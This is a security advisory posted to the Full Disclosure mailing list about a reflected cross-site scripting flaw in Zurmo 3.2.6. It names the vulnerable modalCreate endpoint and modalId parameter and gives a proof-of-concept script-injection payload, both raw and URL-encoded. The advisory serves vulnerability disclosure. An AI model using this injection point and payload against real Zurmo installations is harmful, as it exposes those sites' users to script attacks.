[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAKD6+R4iTA2v-9FGXm8HHua6dhez+nVzKZM=2duka1tQ0=V_1Q@mail.gmail.com>
Date: Thu, 25 Jul 2019 11:36:40 +0200
From: Daniel Bishtawi <daniel@...sparker.com>
To: fulldisclosure@...lists.org, vuln@...unia.com,
submissions@...ketstormsecurity.org
Subject: [FD] Reflected Cross-site Scripting Vulnerability in Zurmo 3.2.6
Hello,
We are informing you about the vulnerabilities in Zurmo 3.2.6.
Here are the details:
Information
--------------------
Advisory by Netsparker
Name: Reflected Cross-site Scripting in Zurmo
Affected Software: Zurmo
Affected Versions: 3.2.6
Homepage: http://zurmo.org
Vulnerability: Reflected Cross-site Scripting
Severity: Critical
Status: Not Fixed
Netsparker Advisory Reference: NS-19-008
Technical Details
--------------------
URL: http://
{DOMAIN}/zurmo/app/index.php/tasks/default/modalCreate?modalId=<scRipt>alert(“xss”)</scRipt>
Parameter Name: modalId
Parameter Type:GET
Attack Pattern:%3cscRipt%3ealert("xss")%3c%2fscRipt%3e
For more information:
https://www.netsparker.com/web-applications-advisories/ns-19-008-reflected-cross-site-scripting-in-zurmo/
Regards,
Daniel Bishtawi
Marketing Administrator | Netsparker Web Application Security Scanner
Tel: +44 (0)20 3588 3843
Follow us on Twitter <https://twitter.com/netsparker> | LinkedIn
<https://www.linkedin.com/company/netsparker-ltd> | Facebook
<https://facebook.com/netsparker>
<https://www.netsparker.com/blog/events/exhibiting-black-hat-usa-2019/>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists